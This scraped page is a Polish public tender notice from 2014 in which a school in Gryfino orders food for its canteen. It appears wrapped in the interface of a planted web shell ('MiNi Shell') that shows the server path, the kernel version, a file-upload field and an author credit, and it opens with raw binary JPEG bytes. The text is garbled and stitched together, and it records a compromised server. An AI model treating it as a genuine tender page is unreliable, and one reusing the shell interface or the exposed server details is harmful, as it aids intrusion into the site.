JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141202/249801-N-2014.html

<p class="kh_header"><b>Gryfino: Zakup i dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w roku 2015.</b><br>
<b>Numer ogłoszenia: 249801 - 2014; data zamieszczenia: 02.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół , ul. Iwaszkiewicza 70, 74-101 Gryfino, woj. zachodniopomorskie, tel. 91 415 10 25, faks 91 416 47 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsgryfino.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka oświatowa utworzona przez JST.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w roku 2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych dla potrzeb stołówki szkolnej Zespołu Szkół w Gryfinie, niezbędnych do sporządzania posiłków w roku 2015. Zakres i wielkość zamówienia:
1	Cukier    1 kg	15831000-4	szt	650
2	Mąka pszenna typ 450  1kg	15612100-2	szt	550
3	Kasza jęczmienna wiejska   1 kg	15613100-9	szt	60
4	Kasza jęczmienna wiejska karton   400g	15613100-9	szt	600
5	Kasza pęczak  1 kg	15613100-9	szt	80
6	Ryż długoziarnisty karton   400g	15614100-6	szt	1450
7	Kasza manna     1 kg	15613300-1	szt	25
8	Ryż  długoziarnisty       1 kg	15614100-6	szt	100
9	Sól jodowana     1 kg	15872400-5	szt	350
10	Bułka tarta      0,5kg	15821000-9	szt	650
11	Makaron nitki       1kg	15851110-2	szt	750
12	Makaron świderki     1kg	15851110-2	szt	350
13	Makaron spagetti         500g                                      	15851190-6	szt	350
14	Mąka ziemniaczana     1kg	15612300-4	szt	60
15	Makaron łazanka       0,5kg	15851110-2	szt	250
16	Makaron  literki    250g	15851110-2	szt	50
17	Makaron  zacierka       250g	15851110-2	szt	400
18	Makaron  kokardy      500g	15851110-2	szt	100
19	Makaron  wstążki       500g	15851110-2	szt	50
20	Makaron  rurka  cięta      500g	15851110-2	szt	100
21	Makaron  kolanka z falbanką     500g 	15851110-2	kg	50
22	Makaron  baranek       400g	15851110-2	szt	10
23	Makaron wstążki M13   1kg	15851110-2	szt	150
24	Kasza gryczana prażona karton    400g	15613100-9	szt	100
25	Kasza jaglana 500 g	15613100-9	kg	100
26	Papryka mielona słodka                   	15871000-4	kg	7
27	Pieprz mielony       1kg	15871000-4	szt	7
28	Majeranek otarty      100g	15872300-4	szt	50
29	Liść laurowy   100g	15872000-1	szt	10
30	Ziele angielskie       100g	15872300-4	szt	10
31	Kwasek cytrynowy    1kg	15871000-4	szt	1
32	Przyprawa typu Warzywko    1kg	15872000-1	szt	150
33	Groszek konserwowy       400g	15331460-9	szt	50
34	Kukurydza konserwowa     400g	15331460-9	szt	100
35	Koncentrat pomidorowy     1kg 	15331425-2	szt	200
36	Szczaw konserwowy         330g	15331000-7	szt	120
37	Majonez  dekoracyjny Winiary      700g 	15871273-8	szt	150
38	Musztarda sarepska            200g	15871250-1	szt	50
39	Fasola typu Jaś                    	01121213-7	kg	150
40	Groch łuskany                     	01121220-9	kg	80
41	Czosnek granulowany         	15871000-4	kg.	0,5
42	Przyprawa w płynie Knorr     1040g	15871000-4	szt	45
43	Chrzan  tarty  słoik   200g.	15332290-3	szt	50
44	Olej  rzepakowy 3l.                              	15411200-4	szt	550
45	Żurek  Knorr       3kg                                                              	15891000-0	szt	20
46	Delikat do mięs            200g	15871200-6	szt	100
47	Cukier puder                    400g	15830000-5	szt	10
48	Gałka muszkatolowa                       100g	15872500-6	szt	10
49	Barszcz biały      Knorr                  3kg	15891000-0	szt	50
50	Pieprz czarny ziarnisty        1kg	15872100-2	szt	15
51	Kminek              100g	15891000-0	szt	10
52	Tymianek               100g.	15871200-6	szt	10
53	Sos sałatkowy          500g	15871200-6	szt	10
54	Zioła prowansalskie     100g	15872000-1	szt	20
55	Bazylia          100g	15872000-1	szt	20
56	Sól peklowa           0,5kg	15891000-0	szt	10
57	Dżem jagodowy      	1532290-3	kg	20
58	Dżem truskawkowy          	1532290-3	kg	50
59	Dżem wiśniowy       	15891000-0	kg	50
60	Dżem z czarnej porzeczki      	15891000-0	kg	50
61	Sok cytrynka    0,5l.	15321000-4	szt	100
62	Fasola drobna     1kg	15331131-4	szt	60
63	Papryka  konserwowa krojona       5l	15331500-2	szt	50
64	Papryka konserwowa        	15331500-2	kg	100
65	Ogórki  konserwowe      900ml	15331500-2	szt	400
66	Ocet  jabłkowy       0,5l	1581120-1	szt	10
67	Sos boloński Knorr          1kg	15332200-6	kg	25
68	Sałatka  szwedzka       3l	15331000-7	szt	50
69	Pomidor b/s   puszka        3l	15331000-7	szt	30
70	Ketchup     1l	15871000-4	szt	100
71	Śliwki suszone        200g	15330000-0	szt	20
72	Ocet 10%    0,5l	1581120-1	szt	50
73	Syrop owocowy         3l.	15321000-1	szt	400
74	Papryka ostra mielona	15321000-1	kg	0,5
75	Cukier waniliowy         32g	15830000-5	szt	10
76	Miód naturalny              1l	15332200-6	l	3
77	Rodzynki                        100g	15871000-4	szt	20
78	Płatki migdałowe          100g	15871000-4	szt	20
79	Sos sojowy             640ml	1581120-1	szt	3
80	Ananas   kawałki    565g	03222112-1	szt	50
81	Brzoskwinie  puszka   850g	03222332-9	szt	50
82	Kompot wiśniowy 0,90l	1039250	szt	100
83	Kompot truskawkowy 0,90l	1039250	szt	100
84	Kompot z czarnej porzeczki 0,90l	1039250	szt	100
85	Kompot śliwkowy 0,90l	1039250	szt	100
86	Ziemniaki  jadalne	01112100-6	kg	20000
87	Ziemniaki młode jadalne	01112100-6	kg	900
88	Jajka świeże duże 65-70g	01242000-5	szt	12000
89	Marchew	01121112-9	kg	2500
90	Cebula	01121113-6	kg	1500
91	Pietruszka korzeń	01121110-5	kg	600
92	Seler korzeń	01121100-2	kg	700
93	Buraki	01121111-2	kg	1000
94	Kapusta biała	01121410-8	kg	1000
95	Kapusta czerwona	01121410-8	kg	500
96	Kapusta pekińska	01121410-8	kg	700
97	Pomidory	01121240-5	kg	300
98	Ogórek świeży                  	01121270-4	kg	500
99	Por   	01121110-5	kg	650
100	Kapusta kiszona	15331142-4	kg	950
101	Ogórek kiszony	15331000-7	kg	350
102	Jabłka	01131321-0	kg	600
103	Szczypior	01121111-2	pęczek	100
104	Sałata	01121310-7	szt	500
105	Papryka świeża  kolorowa	01121230-2	kg	250
106	Pieczarki	15331135-2	kg	400
107	Kalarepa świeża 	15300000-0	szt	100
108	Truskawki świeże	15300000-0	kg	50
109	Rzodkiew  biała	15300000-0	kg	50
110	Boćwina	15300000-0	pęczek	100
111	Kalafior  świeży	15300000-0	szt	100
112	Koper	15300000-0	pęczek	1500
113	Natka	15300000-0	pęczek	1200
114	Rzodkiewka 	15300000-0	pęczek	200
115	Brokuły  świeże	15300000-0	szt	100
116	Cukinia 	15300000-0	kg	40
117	Czosnek  świeży  polski	15331100-0	szt	200
118	Kapusta  włoska	15331100-0	szt	100
119	Fasola szparagowa  żółta	15331130-7	kg	50
120	Szczaw  świeży	15331100-0	pęczek	200
121	Fasolka  szparagowa  zielona	15331130-7	kg	50
122	Mandarynki 	15330000-0	kg	100
123	Salata lodowa	15331100-0	szt	700
124	Cebula czerwona	01121113-6	kg	50
125	Filet z mintaja  bez glazury SHP	15220000-6	kg	950
126	Filet z łososia	15220000-6	kg	20
127	Filet z dorsza  czarniaka bez glazury SHP	15220000-6	kg	100
128	Paluszki  rybne z fileta z mintaja o zawartości mięsa rybiego co najmniej 50%	15220000-6	kg	500
129	Kiełbasa typu podlaska wieprzowa  świeża	15131133-6	kg	10
130	Wołowina zrazowa świeża	15111100-0	kg	50
131	Antrykot wołowy świezy	15110000-9	kg	30
132	Karkówka wieprzowa surowa b/k świeża	15111390	kg	600
133	Szynka wieprzowa surowa b/k świeża	15111350	kg	250
134	Kości wieprzowe z karkówki i schabu świeże  duże	15114000-3	kg	500
135	Kości wędzone	15111310-3	kg	200
136	Łopatka b/k  świeża	15110000-2	kg	1300
137	Schab  b/k  świeży	15110000-2	kg.	700
138	Boczek  wędzony  bez żeberek  świeży	15131133-6	kg	40
139	Żeberka  świeże paski	15110000-2	kg	40
140	Boczek  świeży bez żeberek	15110000-2	kg	30
141	Kurczak świeży                   	15112130-6	kg	30
142	Filet z indyka  świeży	15112220-4	kg	200
143	Filet z kurczaka świeży	15112210-1	kg	1100
144	Udka z kurczaka świeże	15112210-1	kg	1100
145	Udo z indyka świeże	15112220-4	kg	20
146	Szyje z indyka świeże	15112220-4	kg	10
147	Skrzydła z indyka świeże	15112220-4	kg	10
148	Porcje rosołowe świeże	15112000-6	kg	800
149	Korpusy  z  indyka świeże	15112000-6	kg	300
150	Kiełbasa drobiowa z fileta  świeża100% mięsa drobiowego	15131130-5	kg	500
151	Mleko  3,2%     karton         1l	15511210-8	szt	400
152	Śmietana 12%                  0,5 l       	15512000-0	szt	1300
153	Śmietana 18%                  1kg	15512000-0	szt	1500
154	Jogurt naturalny               5kg	15512000-0	szt	400
155	Maślanka                              1l	15512000-0	szt	70
156	Jogurt  owocowy             125g	15512000-0	szt	400
157	Masło ekstra                    200g	15530000-2	szt	300
158	Margaryna typu Kasia     250g	15431100-9	szt	300
159	Twaróg                            1 kg	15542100-0	kg	300
160	Ser żółty typu Gouda	15544400-3	kg	120
161	Fasola szparagowa  1kg	15331170-9	kg	150
162	Kalafior                   1kg	15331170-9	kg	150
163	Brokuły                   1kg	15331170-9	kg	100
164	Truskawki               1kg	15331170-9	kg	100
165	Brukselka                1kg	15871200-6	kg	150
166	Mieszanka chińska  1kg	15331170-9	kg	50
167	Wiśnie bez pestek   1kg	15331170-9	kg	40
168	Śliwki bez pestek    1 kg	15331170-9	kg	40
169	Jagoda                       1kg	15331170-9	kg	40
170	Groszek  zielony       1kg	15331170-9	kg	70
171	Marchew krojona      1kg	15331170-9	kg	30
172	Bułki na parze      700g	15851000-8	szt	500
173	Kopytka                    1kg	15851000-8	szt	200
174	Knedle truskawkowe   1kg	15851000-8	szt	200
175	Mieszanka  kompotowa  4 składnikowa	15331170-9	Kg	200
176	Mieszanka  kompotowa 7  składnikowa	15331170-9	kg	200
177	Chleb krojony pszenny   500g          	15811100-7	szt	500
178	Bułki  małe	15811400-0	szt	50
179	Chleb  razowy               700g	15811100-7	szt	50
180	Bułka  bagietka              300g	15811400-0	szt	2000
181	Pączki 	15811000-6	szt	370
182	Drożdżówka	15811000-6	szt	370.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawca dołączy do oferty następujące dokumenty:
1) formularz oferty - wzór oferty stanowi załącznik Nr 1 do specyfikacji istotnych warunków zamówienia,
2) odpowiednie pełnomocnictwa - w sytuacjach określonych w rozdz. IX pkt 6 specyfikacji istotnych warunków zamówienia oraz w przypadku składania ofert wspólnych,
3) oświadczenie o równoważności produktów wraz z opisem - w przypadku składania ofert równoważnych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsgryfino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Zespołu Szkół w Gryfinie ul. Iwaszkiewicza 70..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2014 godzina 09:15, miejsce: Sekretariat Zespołu Szkół w Gryfinie ul. Iwaszkiewicza 70 - pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com